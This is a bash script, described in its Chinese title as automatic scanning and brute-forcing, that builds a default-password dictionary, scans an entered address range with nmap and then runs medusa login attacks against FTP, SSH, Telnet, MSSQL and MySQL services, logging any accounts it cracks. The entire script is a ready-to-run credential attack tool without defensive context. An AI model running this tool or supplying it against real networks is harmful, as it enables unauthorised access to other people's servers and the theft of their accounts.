自动扫描和暴力破解

#!/bin/bash
#autonmap.sh :
#Author: Qingzheng
#platform: backtrack5 r3

function Usage(){
    echo "########################################"
    echo "#Auto scan and attack                  #"
    echo "#autonmap.sh                           #"
    echo "#Author: Qingzheng                     #"
    echo "########################################"
    echo -e "${red}Example:"
    echo -e "Rhost:>> 192.168.0.0/24" 
    echo -e "Rport:>> 21 (21/22/23/1433/3306)$white"
    echo
  }



function DictCreate(){
    if [ ! -d $(pwd)/tmp ]; then
        mkdir $(pwd)/tmp
        if [ ! -e $(pwd)/tmp/user.dict ]; then echo -en "root
" >$(pwd)/tmp/user.dict; fi
        if [ ! -e $(pwd)/tmp/passwd.dict ]; then
            echo -en "admin
administrator
administrators
root
mysql
admin123
admini123
toor
toor123
mysql
mysql123
123456
12345678
" >$(pwd)/tmp/passwd.dict
        fi

    fi
  }


function Checknmapmedusa(){
if [ ! -e /usr/local/bin/nmap ]; then echo -e "[$blue>$white] Start install nmap";apt-get install -y nmap | sed 's/^/[nmap]/g'; fi
if [ ! -e /usr/local/bin/medusa ]; then echo -e "[$blue>$white] Start install medusa";apt-get install -y medusa | sed 's/^/[medusa]/g'; fi
  }




function ScanAttack(){
    echo -e "[$blue>$white] Starting scan..."
    xterm -geometry 80x20+80+0 -e "nmap -v -sS -sV -oG $(pwd)/tmp/scan-$Rport -p $Rport $Rhost"

    grep "$Rport/open/tcp//$Rserver//" $(pwd)/tmp/scan-$Rport | cut -d' ' -f2 >$(pwd)/tmp/scan-analyze-$Rport && rm -rf $(pwd)/tmp/scan-$Rport
    sed "s/^/ >  /g" $(pwd)/tmp/scan-analyze-$Rport

    if [ -s $(pwd)/tmp/scan-analyze-$Rport ]; then
        echo -e "[$blue>$white] Straring try crack..."
        xterm -geometry 80x20+80+640 -e medusa -U $(pwd)/tmp/user.dict -P $(pwd)/tmp/passwd.dict -e ns -v 10 -H $(pwd)/tmp/scan-analyze-$Rport -M $Rserver -O $(pwd)/tmp/output-$Rport

        if [ -s $(pwd)/tmp/output-$Rport ]; then
            grep "ACCOUNT FOUND: " $(pwd)/tmp/output-$Rport | awk '{print $3,$4,$5,$6,$7,$8,$9}' | sed "s/$Rserver/>/g" | uniq | tee -a $(pwd)/tmp/output-$Rport.lst && rm -rf $(pwd)/tmp/output-$Rport
            echo -e "[$blue>$white] Medusa DONE!!"
        else
            echo -e "[$blue-$white] Not founding passwd!!"
        fi
    else
        echo -e "[$blue>$white] Not founding hosts"
    fi
  }



#####################################################################
#####################################################################


function Main(){ 
    blue="e[01;34m"
    red="e[01;31m"
    white="e[00m"
    underline="\033[4m"
    Usage
    DictCreate
    Checknmapmedusa
    while [ True ];do
        echo -en "${underline}Rhost$white:$blue>>$white"
        read Rhost
        echo -en "${underline}Rport$white:$blue>>$white"
        read Rport
        case $Rport in
        "21") 
                Rserver=ftp
                ScanAttack
        ;;
        "22")
                Rserver=ssh
                ScanAttack
        ;;
        "23")
                Rserver=telnet
                ScanAttack
        ;;
        "1433")
                Rserver=mssql
                ScanAttack
        ;;
        "3306")
                Rserver=mysql
                ScanAttack
        ;;
        *)
                echo -e "[$blue>$white] Input error! Quit!!"
                break
        ;;
        esac
    done
}


#########################################################
#########################################################


Main